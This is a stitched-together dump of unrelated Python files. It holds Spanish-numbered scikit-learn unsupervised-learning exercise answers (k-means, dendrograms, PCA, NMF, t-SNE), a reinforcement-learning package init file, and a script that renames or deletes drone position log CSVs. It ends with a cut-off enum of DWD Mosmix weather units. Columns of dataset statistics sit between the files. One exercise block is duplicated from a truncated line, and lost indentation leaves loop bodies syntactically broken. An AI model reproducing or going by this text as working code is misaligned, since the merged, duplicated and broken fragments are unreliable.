pipeline = make_pipeline(scaler, kmeans)
# ===================== #
# ==== Ejercicio 6 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to samples
pipeline.fit(samples)
# Calculate the cluster labels: labels
labels = pipeline.predict(samples)
# Create a DataFrame with labels and species as columns: df
df = pd.DataFrame({'labels': labels, 'species': species})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['species'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 7 ==== #
# ===================== #
# Import Normalizer
from sklearn.preprocessing import Normalizer
# Create a normalizer: normalizer
normalizer = Normalizer()
# Create a KMeans model with 10 clusters: kmeans
kmeans = KMeans(n_clusters = 10)
# Make a pipeline chaining normalizer and kmeans: pipeline
pipeline = make_pipeline(normalizer, kmeans)
# Fit pipeline to the daily price movements
pipeline.fit(movements)
# ===================== #
# ==== Ejercicio 8 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Predict the cluster labels: labels
labels = pipeline.predict(movements)
# Create a DataFrame aligning labels and companies: df
df = pd.DataFrame({'labels': labels, 'companies': companies})
# Display df sorted by cluster label
print(df.sort_values('labels'))
# ===================== #
# ==== Ejercicio 9 ==== #
# ===================== #
# Perform the necessary imports
from scipy.cluster.hierarchy import linkage, dendrogram
import matplotlib.pyplot as plt
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'complete')
# Plot the dendrogram, using varieties as labels
dendrogram(mergings,
labels = varieties,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 10 === #
# ===================== #
# Import normalize
from sklearn.preprocessing import normalize
# Normalize the movements: normalized_movements
normalized_movements = normalize(movements)
# Calculate the linkage: mergings
mergings = linkage(normalized_movements, method = 'complete')
# Plot the dendrogram
dendrogram(mergings,
labels = companies,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 11 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.cluster.hierarchy import linkage, dendrogram
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'single')
# Plot the dendrogram
dendrogram(mergings, labels = country_names, leaf_rotation = 90, leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 12 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from scipy.cluster.hierarchy import fcluster
# Use fcluster to extract labels: labels
labels = fcluster(mergings, 6, criterion = 'distance')
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 13 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 200)
# Apply fit_transform to samples: tsne_features
tsne_features = model.fit_transform(samples)
# Select the 0th feature: xs
xs = tsne_features[:,0]
# Select the 1st feature: ys
ys = tsne_features[:,1]
# Scatter plot, coloring by variety_numbers
plt.scatter(xs, ys, c = variety_numbers)
plt.show()
# ===================== #
# ==== Ejercicio 14 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 50)
# Apply fit_transform to normalized_movements: tsne_features
tsne_features = model.fit_transform(normalized_movements)
# Select the 0th feature: xs
xs = tsne_features[:, 0]
# Select the 1th feature: ys
ys = tsne_features[:, 1]
# Scatter plot
plt.scatter(xs, ys, alpha = 0.5)
# Annotate the points
for x, y, company in zip(xs, ys, companies):
plt.annotate(company, (x, y), fontsize=5, alpha=0.75)
plt.show()
# ===================== #
# ==== Ejercicio 15 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.stats import pearsonr
# Assign the 0th column of grains: width
width = grains[:, 0]
# Assign the 1st column of grains: length
length = grains[:, 1]
# Scatter plot width vs length
plt.scatter(width, length)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation
correlation, pvalue = pearsonr(width, length)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 16 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create PCA instance: model
model = PCA()
# Apply the fit_transform method of model to grains: pca_features
pca_features = model.fit_transform(grains)
# Assign 0th column of pca_features: xs
xs = pca_features[:,0]
# Assign 1st column of pca_features: ys
ys = pca_features[:,1]
# Scatter plot xs vs ys
plt.scatter(xs, ys)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation of xs and ys
correlation, pvalue = pearsonr(xs, ys)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 17 === #
# ===================== #
# Make a scatter plot of the untransformed points
plt.scatter(grains[:,0], grains[:,1])
# Create a PCA instance: model
model = PCA()
# Fit model to points
model.fit(grains)
# Get the mean of the grain samples: mean
mean = model.mean_
# Get the first principal component: first_pc
first_pc = model.components_[0, :]
# Plot first_pc as an arrow, starting at mean
plt.arrow(mean[0], mean[1], first_pc[0], first_pc[1], color = 'red', width = 0.01)
# Keep axes on same scale
plt.axis('equal')
plt.show()
# ===================== #
# ==== Ejercicio 18 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline
import matplotlib.pyplot as plt
# Create scaler: scaler
scaler = StandardScaler()
# Create a PCA instance: pca
pca = PCA()
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, pca)
# Fit the pipeline to 'samples'
pipeline.fit(samples)
# Plot the explained variances
features = range(pca.n_components_)
plt.bar(features, pca.explained_variance_)
plt.xlabel('PCA feature')
plt.ylabel('variance')
plt.xticks(features)
plt.show()
# ===================== #
# ==== Ejercicio 19 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA model with 2 components: pca
pca = PCA(n_components = 2)
# Fit the PCA instance to the scaled samples
pca.fit(scaled_samples)
# Transform the scaled samples: pca_features
pca_features = pca.transform(scaled_samples)
# Print the shape of pca_features
print(pca_features.shape)
# ===================== #
# ==== Ejercicio 20 === #
# ===================== #
# Import TfidfVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
# Create a TfidfVectorizer: tfidf
tfidf = TfidfVectorizer()
# Apply fit_transform to document: csr_mat
csr_mat = tfidf.fit_transform(documents)
# Print result of toarray() method
print(csr_mat.toarray())
# Get the words: words
words = tfidf.get_feature_names()
# Print words
print(words)
# ===================== #
# ==== Ejercicio 21 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import TruncatedSVD
from sklearn.cluster import KMeans
from sklearn.pipeline import make_pipeline
# Create a TruncatedSVD instance: svd
svd = TruncatedSVD(n_components = 50)
# Create a KMeans instance: kmeans
kmeans = KMeans(n_clusters = 6)
# Create a pipeline: pipeline
pipeline = make_pipeline(svd, kmeans)
# ===================== #
# ==== Ejercicio 22 === #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to articles
pipeline.fit(articles)
# Calculate the cluster labels: labels
labels = pipeline.predict(articles)
# Create a DataFrame aligning labels and titles: df
df = pd.DataFrame({'label': labels, 'article': titles})
# Display df sorted by cluster label
print(df.sort_values('label'))
# ===================== #
# ==== Ejercicio 23 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF instance: model
model = NMF(n_components = 6)
# Fit the model to articles
model.fit(articles)
# Transform the articles: nmf_features
nmf_features = model.transform(articles)
# Print the NMF features
print(nmf_features)
# ===================== #
# ==== Ejercicio 24 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a pandas DataFrame: df
df = pd.DataFrame(nmf_features, index = titles)
# Print the row for 'Anne Hathaway'
print(df.loc['Anne Hathaway'])
# Print the row for 'Denzel Washington'
print(df.loc['Denzel Washington'])
# ===================== #
# ==== Ejercicio 25 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: components_df
components_df = pd.DataFrame(model.components_, columns = words)
# Print the shape of the DataFrame
print(components_df.shape)
# Select row 3: component
component = components_df.iloc[3]
# Print result of nlargest
print(component.nlargest())
# ===================== #
# ==== Ejercicio 26 === #
# ===================== #
# Import pyplot
from matplotlib import pyplot as plt
# Select the 0th row: digit
digit = samples[0, :]
# Print digit
print(digit)
# Reshape digit to a 13x8 array: bitmap
bitmap = digit.reshape(13, 8)
# Print bitmap
print(bitmap)
# Use plt.imshow to display bitmap
plt.imshow(bitmap, cmap='gray', interpolation='nearest')
plt.colorbar()
plt.show()
# ===================== #
# ==== Ejercicio 27 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF model: model
model = NMF(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# Assign the 0th row of features: digit_features
digit_features = features[0, :]
# Print digit_features
print(digit_features)
# ===================== #
# ==== Ejercicio 28 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA instance: model
model = PCA(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# ===================== #
# ==== Ejercicio 29 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from sklearn.preprocessing import normalize
# Normalize the NMF features: norm_features
norm_features = normalize(nmf_features)
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = titles)
# Select the row corresponding to 'Cristiano Ronaldo': article
article = df.loc['Cristiano Ronaldo']
# Compute the dot products: similarities
similarities = df.dot(article)
# Display those with the largest cosine similarity
print(similarities.nlargest())
# ===================== #
# ==== Ejercicio 30 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import NMF
from sklearn.preprocessing import Normalizer, MaxAbsScaler
from sklearn.pipeline import make_pipeline
# Create a MaxAbsScaler: scaler
scaler = MaxAbsScaler()
# Create an NMF model: nmf
nmf = NMF(n_components = 20)
# Create a Normalizer: normalizer
normalizer = Normalizer()
# Create a pipeline: pipeline
pipeline = make_pipeline(scaler, nmf, normalizer)
# Apply fit_transform to artists: norm_features
norm_features = pipeline.fit_transform(artists)
# ===================== #
# ==== Ejercicio 31 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = artist_names)
# Select row of 'Bruce Springsteen': artist
artist = df.loc['Bruce Springsteen']
# Compute cosine similarities: similarities
similarities = df.dot(artist)
# Display those with highest cosine similarity
print(similarities.nlargest())=========== #
# ==== Ejercicio 22 === #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to articles
pipeline.fit(articles)
# Calculate the cluster labels: labels
labels = pipeline.predict(articles)
# Create a DataFrame aligning labels and titles: df
df = pd.DataFrame({'label': labels, 'article': titles})
# Display df sorted by cluster label
print(df.sort_values('label'))
# ===================== #
# ==== Ejercicio 23 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF instance: model
model = NMF(n_components = 6)
# Fit the model to articles
model.fit(articles)
# Transform the articles: nmf_features
nmf_features = model.transform(articles)
# Print the NMF features
print(nmf_features)
# ===================== #
# ==== Ejercicio 24 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a pandas DataFrame: df
df = pd.DataFrame(nmf_features, index = titles)
# Print the row for 'Anne Hathaway'
print(df.loc['Anne Hathaway'])
# Print the row for 'Denzel Washington'
print(df.loc['Denzel Washington'])
# ===================== #
# ==== Ejercicio 25 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: components_df
components_df = pd.DataFrame(model.components_, columns = words)
# Print the shape of the DataFrame
print(components_df.shape)
# Select row 3: component
component = components_df.iloc[3]
# Print result of nlargest
print(component.nlargest())
# ===================== #
# ==== Ejercicio 26 === #
# ===================== #
# Import pyplot
from matplotlib import pyplot as plt
# Select the 0th row: digit
digit = samples[0, :]
# Print digit
print(digit)
# Reshape digit to a 13x8 array: bitmap
bitmap = digit.reshape(13, 8)
# Print bitmap
print(bitmap)
# Use plt.imshow to display bitmap
plt.imshow(bitmap, cmap='gray', interpolation='nearest')
plt.colorbar()
plt.show()
# ===================== #
# ==== Ejercicio 27 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF model: model
model = NMF(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# Assign the 0th row of features: digit_features
digit_features = features[0, :]
# Print digit_features
print(digit_features)
# ===================== #
# ==== Ejercicio 28 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA instance: model
model = PCA(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# ===================== #
# ==== Ejercicio 29 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from sklearn.preprocessing import normalize
# Normalize the NMF features: norm_features
norm_features = normalize(nmf_features)
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = titles)
# Select the row corresponding to 'Cristiano Ronaldo': article
article = df.loc['Cristiano Ronaldo']
# Compute the dot products: similarities
similarities = df.dot(article)
# Display those with the largest cosine similarity
print(similarities.nlargest())
# ===================== #
# ==== Ejercicio 30 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import NMF
from sklearn.preprocessing import Normalizer, MaxAbsScaler
from sklearn.pipeline import make_pipeline
# Create a MaxAbsScaler: scaler
scaler = MaxAbsScaler()
# Create an NMF model: nmf
nmf = NMF(n_components = 20)
# Create a Normalizer: normalizer
normalizer = Normalizer()
# Create a pipeline: pipeline
pipeline = make_pipeline(scaler, nmf, normalizer)
# Apply fit_transform to artists: norm_features
norm_features = pipeline.fit_transform(artists)
# ===================== #
# ==== Ejercicio 31 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = artist_names)
# Select row of 'Bruce Springsteen': artist
artist = df.loc['Bruce Springsteen']
# Compute cosine similarities: similarities
similarities = df.dot(artist)
# Display those with highest cosine similarity
print(similarities.nlargest())
| 28.384519
| 112
| 0.654036
| 5,496
| 45,103
| 5.289301
| 0.049309
| 0.019505
| 0.016512
| 0.024149
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.011007
| 0.14795
| 45,103
| 1,588
| 113
| 28.402393
| 0.745433
| 0.499634
| 0
| 0.99842
| 0
| 0
| 0.041426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.199052
| null | null | 0.099526
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f1180f32f5da4329068a67abe4dca7bb657a822
| 205
|
py
|
Python
|
AgentRL/common/buffers/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
AgentRL/common/buffers/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
AgentRL/common/buffers/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
from AgentRL.common.buffers.base import base_buffer
from AgentRL.common.buffers.standard_buffer import standard_replay_buffer
from AgentRL.common.buffers.prioritised_buffer import prioritised_replay_buffer
| 68.333333
| 79
| 0.902439
| 28
| 205
| 6.357143
| 0.357143
| 0.185393
| 0.286517
| 0.404494
| 0.337079
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053659
| 205
| 3
| 79
| 68.333333
| 0.917526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0f6dfe7c1f155902ab660683f7a8736beadb04ad
| 10,962
|
py
|
Python
|
publication/Mass_Reformatter.py
|
kianheus/uwb-simulator
|
888cdcae0d4ca101970971afbdf0113ba3bb1480
|
[
"MIT"
] | null | null | null |
publication/Mass_Reformatter.py
|
kianheus/uwb-simulator
|
888cdcae0d4ca101970971afbdf0113ba3bb1480
|
[
"MIT"
] | null | null | null |
publication/Mass_Reformatter.py
|
kianheus/uwb-simulator
|
888cdcae0d4ca101970971afbdf0113ba3bb1480
|
[
"MIT"
] | null | null | null |
import os
publication_folder = os.path.join("C:\\Users\\Kian Heus\\Documents\\GitHub\\uwb-simulator\\publication")
for run_folder in os.listdir(publication_folder):
if "anchors_" in run_folder:
print(run_folder)
Na = int(run_folder.split("_")[1])
N_helpers = int(run_folder.split("_")[3])
for trajectory in os.listdir(os.path.join(publication_folder, run_folder)):
for index, log in enumerate(os.listdir(os.path.join(publication_folder, run_folder, trajectory))):
if "Log" in log and not N_helpers == 8:
os.rename(os.path.join(publication_folder, run_folder, trajectory, log),
os.path.join(publication_folder, run_folder, trajectory,
"DronePosLog" + chr(index + 65) + ".csv"))
# Inverse
#os.rename(os.path.join(publication_folder, run_folder, trajectory, log),
#os.path.join(publication_folder, run_folder, trajectory, "DronePosLog" + str(index) + ".csv"))
print(log)
if N_helpers == 7:
print()
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogA.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog0.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogB.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog1.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogC.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog2.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogD.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog7.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogE.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog3.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogF.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog6.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogG.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog5.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogH.csv"))
if N_helpers == 6:
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogA.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog0.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogB.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog1.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogC.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog2.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogD.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogE.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog3.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogF.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog4.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogG.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog5.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogH.csv"))
if N_helpers == 5:
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogA.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog0.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogB.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog1.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogC.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog2.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogD.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog3.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogE.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogF.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogG.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogH.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog4.csv"))
if N_helpers == 4:
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogA.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogB.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog0.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogC.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogD.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog1.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogE.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogF.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog2.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogG.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogH.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog3.csv"))
if N_helpers == 3:
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogA.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog0.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogB.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog1.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogC.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogD.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogE.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogF.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogG.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogH.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog2.csv"))
if N_helpers == 2:
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogA.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogB.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogC.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogD.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog0.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogE.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogF.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogG.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogH.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog1.csv"))
if N_helpers == 1:
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogA.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogB.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogC.csv"))
os.rename(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogD.csv"),
os.path.join(publication_folder, run_folder, trajectory, "DronePosLog0.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogE.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogF.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogG.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogH.csv"))
if N_helpers == 0:
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogA.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogB.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogC.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogD.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogE.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogF.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogG.csv"))
os.remove(os.path.join(publication_folder, run_folder, trajectory, "DronePosLogH.csv"))
| 87
| 125
| 0.644864
| 1,212
| 10,962
| 5.65429
| 0.05363
| 0.135269
| 0.144462
| 0.300306
| 0.942361
| 0.942361
| 0.942361
| 0.942361
| 0.940902
| 0.927769
| 0
| 0.004897
| 0.236271
| 10,962
| 125
| 126
| 87.696
| 0.813665
| 0.015782
| 0
| 0.782609
| 0
| 0
| 0.145308
| 0.004729
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008696
| 0
| 0.008696
| 0.026087
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7e24d4a9124bb82f33339cef9cc471bea503fa84
| 24,175
|
py
|
Python
|
wetterdienst/provider/dwd/forecast/metadata/unit.py
|
waltherg/wetterdienst
|
3c5c63b5b8d3e19511ad789bb499bdaa9b1976d9
|
[
"MIT"
] | null | null | null |
wetterdienst/provider/dwd/forecast/metadata/unit.py
|
waltherg/wetterdienst
|
3c5c63b5b8d3e19511ad789bb499bdaa9b1976d9
|
[
"MIT"
] | null | null | null |
wetterdienst/provider/dwd/forecast/metadata/unit.py
|
waltherg/wetterdienst
|
3c5c63b5b8d3e19511ad789bb499bdaa9b1976d9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, earthobservations developers.
# Distributed under the MIT License. See LICENSE for more info.
from wetterdienst.metadata.unit import MetricUnit, OriginUnit, UnitEnum
from wetterdienst.util.parameter import DatasetTreeCore
class DwdMosmixUnitOrigin(DatasetTreeCore):
class SMALL(UnitEnum):
TEMPERATURE_AIR_200 = OriginUnit.DEGREE_KELVIN.value
TEMPERATURE_DEW_POINT_200 = OriginUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_MAX_200 = OriginUnit.DEGREE_KELVIN.value
TEMPERATURE_AIR_MIN_200 = OriginUnit.DEGREE_KELVIN.value
WIND_DIRECTION = OriginUnit.WIND_DIRECTION.value
WIND_SPEED = OriginUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_1H = OriginUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_3H = OriginUnit.METER_PER_SECOND.value
WIND_GUST_MAX_LAST_12H = OriginUnit.METER_PER_SECOND.value
PRECIPITATION_CONSIST_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_CONSIST_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_SNOW_EQUIV_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
PRECIPITATION_SNOW_EQUIV_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
WEATHER_SIGNIFICANT = OriginUnit.SIGNIFICANT_WEATHER.value
WEATHER_LAST_6H = OriginUnit.DIMENSIONLESS.value
CLOUD_COVER_TOTAL = OriginUnit.PERCENT.value
CLOUD_COVER_EFFECTIVE = OriginUnit.PERCENT.value
CLOUD_COVER_BELOW_500_FT = OriginUnit.PERCENT.value
CLOUD_COVER_BELOW_1000_FT = OriginUnit.PERCENT.value
CLOUD_COVER_BETWEEN_2_TO_7_KM = OriginUnit.PERCENT.value
CLOUD_COVER_ABOVE_7_KM = OriginUnit.PERCENT.value
PRESSURE_AIR_SURFACE_REDUCED = OriginUnit.PASCAL.value
TEMPERATURE_AIR_005 = OriginUnit.DEGREE_KELVIN.value
RADIATION_GLOBAL = OriginUnit.GLOBAL_IRRADIANCE.value
VISIBILITY = OriginUnit.METER.value
SUNSHINE_DURATION = OriginUnit.SECOND.value
PROBABILITY_WIND_GUST_GE_25_KN_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_40_KN_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_WIND_GUST_GE_55_KN_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_FOG_LAST_1H = OriginUnit.PERCENT.value
PROBABILITY_FOG_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_FOG_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_6H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_24H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_12H = OriginUnit.PERCENT.value
PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_6H = OriginUnit.PERCENT.value
